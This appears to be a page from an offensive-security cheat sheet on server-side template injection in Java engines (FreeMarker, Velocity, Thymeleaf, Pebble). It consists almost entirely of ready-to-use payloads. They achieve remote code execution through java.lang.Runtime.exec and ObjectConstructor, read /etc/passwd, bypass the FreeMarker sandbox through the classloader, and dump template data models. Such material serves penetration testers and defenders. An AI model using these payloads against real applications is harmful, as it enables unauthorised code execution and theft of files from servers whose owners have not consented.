Skip to main content

FreeMarker, Velocity & Java Engines

CWECWE-1336
Toolstplmap
Difficulty🔴 advanced

FreeMarker (Java)​

FreeMarker is commonly used in Java web applications and Spring-based systems.

Exploitation methodology:

  1. RCE via Execute utility:

    <#assign ex="freemarker.template.utility.Execute"?new()>
    ${ex("id")}

  2. Alternative one-liner RCE:

    ${"freemarker.template.utility.Execute"?new()("id")}

  3. RCE via ObjectConstructor:

    <#assign oc="freemarker.template.utility.ObjectConstructor"?new()>
    <#assign rt=oc("java.lang.Runtime")>
    ${rt.getRuntime().exec("id")}

  4. File read:

    <#assign is=oc("java.io.InputStreamReader",oc("java.io.FileInputStream","/etc/passwd"))>
    <#assign br=oc("java.io.BufferedReader",is)>
    <#list 1..5 as _>
    ${br.readLine()!""}
    </#list>

  5. Data model access:

    ${.data_model}
    ${.globals}
    ${.vars}

FreeMarker sandbox bypass:

${.version}
${"test"?eval}
<#assign classloader=thread.currentThread().getContextClassLoader()>
${classloader.loadClass("java.lang.Runtime")}

Velocity (Java)​

Velocity is used in Apache applications and some Java web frameworks.

Exploitation methodology:

  1. RCE via Java Runtime:

    #set($x="")
    #set($rt=$x.class.forName("java.lang.Runtime"))
    #set($chr=$x.class.forName("java.lang.Character"))
    #set($proc=$rt.getRuntime().exec("id"))
    $proc.waitFor()

  2. Simplified RCE (when runtime object is available):

    $class.inspect("java.lang.Runtime").type.getRuntime().exec("id").waitFor()

  3. RCE through ClassLoader:

    #set($cl=$class.class.classLoader)
    $cl.loadClass("java.lang.Runtime").getMethod("exec","".class).invoke($cl.loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")

  4. File read:

    #set($x='')
    #set($file=$x.class.forName('java.io.File'))
    #set($scanner=$x.class.forName('java.util.Scanner'))
    #set($s=$scanner.getConstructor($file).newInstance($file.getConstructor($x.class).newInstance('/etc/passwd')))
    $s.useDelimiter('\A').next()

Thymeleaf (Java)​

RCE via inline expressions:

[[${#rt.exec('id')}]]

RCE via SpEL:

${T(java.lang.Runtime).getRuntime().exec('id')}

Pebble (Java)​

Pebble is a Java templating engine inspired by Twig.

Detection:

{{ 7*7 }}
{{ request }}
{{ beans }}

RCE:

{% set cmd = 'id' %}
{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}
{{ (1).TYPE.forName('java.lang.String').constructors[0].newInstance(bytes) }}